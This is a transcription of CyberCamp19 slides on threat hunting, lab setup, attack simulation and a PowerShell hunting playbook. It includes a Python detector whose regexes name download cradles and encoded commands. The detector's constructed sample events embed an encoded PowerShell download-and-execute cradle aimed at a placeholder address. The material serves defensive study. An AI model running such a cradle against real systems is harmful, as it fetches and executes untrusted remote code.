Threat Hunting and Attack Simulation - CyberCamp

Transcription

#CyberCamp19 Threat Hunting and Attack Simulation. Lórien Doménech Ruiz and Carlos Caballero García

Index
1. Threat Hunting Intro
2. Vulnerabilities exploited by cybercriminals
3. Configuring threat hunting environments
4. Attack simulation
5. Playbook and case study
6. Conclusions

#CyberCamp19 Speakers: Lórien Doménech Ruiz, Carlos Caballero García

1. Threat Hunting Intro

Threat Hunting Intro
Where is Threat Hunting in an Incident Life Cycle?
Professionals: Hackers, Sysadmins, Analysts, Incident Responders, Forensics

Threat Hunting Intro
What is it for?

Threat Hunting Intro
What do we need?

Threat Hunting Intro
Other resources

2. Vulnerabilities exploited by cybercriminals

Vulnerabilities exploited by cybercriminals
MITRE ATT&CK: a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations (ATT&CK for Enterprise).

Vulnerabilities exploited by cybercriminals
Cybercriminals: Lazarus Group

Vulnerabilities exploited by cybercriminals
MITRE ATT&CK on sandbox: Ryuk ransomware analysis - 09/2019

3. Configuring threat hunting environments

Threat Hunting environments
House Lab with ESXi
Requirements:
- Laptops
- Server with ESXi
- VM Windows Server 2019
- VM Windows 10
- VM Windows 7
- CentOS 7
- Ubuntu Server 18.04 (Caldera)
- Splunk Cloud (Universal Forwarder on the VMs)
- Sysmon configuration
- VPN

Threat Hunting environments
House Lab with ESXi
Detailed requirements (one row per machine, as listed on the slide):
CPU: 2, RAM: 4GB, DISK: 40GB
CPU: 2, RAM: 2GB, DISK: 20GB
CPU: 4, RAM: 6GB, DISK: 40GB
CPU: 2, RAM: 3GB, DISK: 10GB
CPU: Xeon 16, RAM: 64GB, DISK: 2TB
CPU: 2, RAM: 2GB, DISK: 10GB

Threat Hunting environments
Sysmon Configuration
Install Sysmon with a configuration file in the environment. Installation:
sysmon -accepteula -i c:\windows\config.xml


Threat Hunting environments
Detection Lab
This lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configuration.
Primary Lab Features:
- Microsoft Advanced Threat Analytics is installed on the WEF machine, with the lightweight ATA gateway installed on the DC
- Splunk forwarders are pre-installed and all indexes are pre-created. Technology add-ons for Windows are also preconfigured.
- A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
- Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
- PowerShell transcript logging is enabled. All logs are saved to \\wef\pslogs
- osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
- Sysmon is installed and configured using SwiftOnSecurity's open-sourced configuration
- All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
- SMBv1 Auditing is enabled
Requirements:
- 55GB of free disk space
- 16GB of RAM
- Packer 1.3.2 or newer
- Vagrant 2.2.2 or newer
- Virtualbox or VMWare or AWS
DEMO TIME!

Threat Hunting environments
SOF-ELK VM
Platform focused on the typical needs of computer forensic investigators/analysts and information security operations personnel. The platform is a customized build of the open source Elastic stack, consisting of the Elasticsearch storage and search engine, Logstash ingest and enrichment system, Kibana dashboard frontend, and Elastic Beats log shipper.
Requirements:
- 40GB of free disk space
- 8GB of RAM
- VMWare

Threat Hunting environments
HELK
HELK is one of the first open source hunt platforms. Components and structure: (diagram on the slide)
Requirements:
- 40GB of free disk space
- 8GB of RAM
- VMWare

4. Attack simulation

Attack simulation
Caldera
CALDERA is an automated adversary emulation system, built on the MITRE ATT&CK framework.
Caldera 2.0 changes: the introduction of two operating modes: adversary mode (the classic CALDERA capability) and chain mode (designed to allow users to orchestrate/string together atomic unit tests into larger attack sequences).
Requirements:
- Python 3.5.3
- Google Chrome is the only supported/tested browser
- Plugins
DEMO TIME!

Attack simulation
Cymulate
Cymulate tests the strength of a company's security by simulating real cyber attacks across all attack vectors, based on MITRE ATT&CK.
Requirements:
- Agent in the host
- Whitelist IP

5. Playbook and case study

Playbook and case study
PowerShell Hunting

General Information
Date: 29/08/2019
Created by: Lórien Doménech Ruiz
Last execution date: 09/09/2019
Estimated Resources: About 24 hours
Priority: High

PowerShell Execution
Tactic: Execution
Technique: PowerShell (T1086)

Hypothesis & Trigger
Hypothesis: Adversaries are using PowerShell commands to attack our infrastructure to gain access to resources inside the organization.
Hypothesis Status: Initial
Trigger: Too many events related to suspicious PowerShell commands have been found on the SIEM and/or corporate Anti-Virus.
MITRE Reference: PowerShell (T1086)
Classification: Execution

Technique Description
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. Administrator permissions are required to use PowerShell to connect to remote systems.

Techniques Detection - Basic PowerShell Execution
Detection of PowerShell execution locally or remotely. This only focuses on the execution of PowerShell and not on what happens after the execution or the specific goal. This can be linked to several PowerShell execution variants.

Techniques Detection - Alternate Signed PowerShell Hosts
Detection of the abuse of signed PowerShell hosts bypassing application whitelisting and potentially constrained language mode. This focuses on PowerShell hosts beyond powershell.exe, powershell_ise.exe or wsmprovhost.exe.

Playbook and case study
Threat Intelligence
TH focus on the sector: Energy
Possible actors: APT32, APT33, APT34, Dragonfly, Magic Hound, Threat Group-3390
APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based.
Software: APT32: Cobalt Strike - commercial penetration testing tool
Active campaign?: APT32 (Last attack: February 2018, Area: East-Asian countries, References: link, link2)
Actor capability: APT32 (Initial access: spear-phishing emails, capability: High)
ATT&CK Data Source: PowerShell logs
Recommended Data Sources:
- Event Log: Microsoft-Windows-Sysmon/Operational
- Turn on PowerShell Transcription
- Loaded DLLs / DLL monitoring
- Windows Registry
- File monitoring
- Process monitoring
- Process command-line parameters
- WinEvent: powershell.exe, regsvr32.exe, cscript.exe, wscript.exe, Rundll32.exe

Playbook and case study
Hunt Actions
Dates: 03/09/2019, 04/09/2019, 05/09/2019
Actions:
- Research, get information from the IT client and set up the Lab environment
- Set up the Lab environment and research
- Looking for Event ID: 4100, 4103 and 4104
- Looking for Event ID: 200, 400, 500, 501 and 800
- Try a new configuration with Sysmon to log more events

Hunt Detail
Mitigations
It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict the PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass) Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.
- Code Signing: Set the PowerShell execution policy to execute only signed scripts.
- Disable or Remove Feature or Program: It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.
- Privileged Account Management: When PowerShell is necessary, restrict the PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.
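Added example (not the speakers' code) covering both detections of the playbook, Basic PowerShell Execution and Alternate Signed PowerShell Hosts, together with the event IDs the hunt actions look for. It runs the two checks over a handful of constructed event records shaped like the Windows PowerShell log fields a Splunk/ELK search or Get-WinEvent would return. The event IDs and field names (HostApplication on 400/4103, ScriptBlockText on 4104) are the real ones; the records, the computer names, the TEST-NET URL and the non-standard host `pshost.exe` are constructed for the demonstration, and the indicator list is a deliberately short starting point rather than a complete ruleset.

```python
"""Hunt helpers for the 'PowerShell Hunting' playbook (added example, not the
speakers' code).  Events are dicts carrying the field names of the real logs:
EventID 400/4103 carry HostApplication (classic 'Windows PowerShell' log and
the Operational module log), EventID 4104 carries ScriptBlockText (script
block logging).  All records below are constructed samples."""
import base64
import re
from collections import Counter
from pathlib import PureWindowsPath

# Hosts the playbook treats as expected; the engine inside any other process
# is an 'Alternate Signed PowerShell Host' finding.
EXPECTED_HOSTS = {"powershell.exe", "powershell_ise.exe", "wsmprovhost.exe"}
HOST_EVENTS = {400, 4103}      # events whose HostApplication names the host
SCRIPT_BLOCK_EVENT = 4104      # script text as the engine actually ran it

# Short, explainable indicators behind the hypothesis' 'suspicious PowerShell'
# trigger.  Matched case-insensitively against command lines, script blocks
# and the decoded payload of -EncodedCommand.
SUSPICIOUS = {
    "download-cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
EXE_PATH = re.compile(r'"?([^"]*?\.exe)', re.I)   # path part of HostApplication


def decode_encoded_command(command_line):
    """UTF-16LE plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def host_name(host_application):
    """Lower-case executable name from a HostApplication value (path + arguments)."""
    match = EXE_PATH.match(host_application)
    return PureWindowsPath(match.group(1)).name.lower() if match else ""


def scan(text, decoded=None):
    """Indicator names matching the text or its decoded -EncodedCommand payload."""
    return [name for name, pattern in SUSPICIOUS.items()
            if pattern.search(text) or (decoded and pattern.search(decoded))]


def hunt(events):
    """Both playbook detections over a list of events -> (finding, computer, evidence)."""
    findings = []
    for event in events:
        event_id, computer = event.get("EventID"), event.get("Computer", "?")
        if event_id in HOST_EVENTS:
            app = event.get("HostApplication", "")
            exe = host_name(app)
            if exe and exe not in EXPECTED_HOSTS:
                findings.append(("alternate-powershell-host", computer, exe))
            decoded = decode_encoded_command(app)
            for name in scan(app, decoded):
                findings.append((name, computer, (decoded or app)[:80]))
        elif event_id == SCRIPT_BLOCK_EVENT:
            text = event.get("ScriptBlockText", "")
            for name in scan(text):
                findings.append((name, computer, text[:80]))
    return findings


def baseline_hosts(events):
    """Hunter note 1: what normal looks like -- engine starts per host executable."""
    return Counter(host_name(e.get("HostApplication", ""))
                   for e in events if e.get("EventID") in HOST_EVENTS)


# Constructed sample records (not real captures).  The encoded payload is the
# textbook download cradle that script block logging and event 400 expose.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/x')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"EventID": 400, "Computer": "WS01", "HostApplication": PS_EXE + " -NoProfile"},
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText": "Get-Service | Where-Object Status -eq 'Running'"},
    {"EventID": 400, "Computer": "WS02", "HostApplication": PS_EXE + " -nop -w hidden -enc " + ENCODED},
    {"EventID": 4103, "Computer": "WS03", "HostApplication": r"C:\Temp\pshost.exe --listen"},  # constructed non-standard host
    {"EventID": 4104, "Computer": "WS04", "ScriptBlockText": r"Invoke-Expression (Get-Content C:\Temp\s.ps1 -Raw)"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
    print("baseline:", dict(baseline_hosts(SAMPLE_EVENTS)))
```

On the sample, WS01 produces no findings (a profile-less interactive session and a routine service query), WS02 yields four (hidden window, encoded command, and the decoded cradle's IEX and DownloadString), WS03 is flagged as a non-standard host, and WS04 for Invoke-Expression. `baseline_hosts` is the counting step behind hunter note 1: run it over a quiet period first so that expected hosts and volumes are documented before the same checks go against production data.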

Playbook and case study
Date: 10/09/2019
Final Conclusions
Time spent: 30 hours
Has the hypothesis been confirmed? [ ] No. [X] Partially. [ ] Yes.
Triggers another hunt? [ ] No. [X] Yes.
Constraints or difficulties while executing? The systems don't collect all PowerShell information in the logs.
Hunter Notes
1. Explore the data produced in the lab environment with the analytics above and document what normal looks like from a PowerShell perspective. Then, take the findings and explore in the production environment.
2. If execution of PowerShell happens all the time in your environment, then categorize the data collected by business unit or department to document profiles more efficiently.
Activity Logs? Partial
Client Info / Suggested Use Case: Lab environment

6. Conclusions

Resources
Threat Hunting: TaHiTI and /a/a8/GOD17-Sigma.pdf
Detection: m/mitre/caldera

THANK YOU #CyberCamp19 @loriendr @CarlosCabal @CybercampES
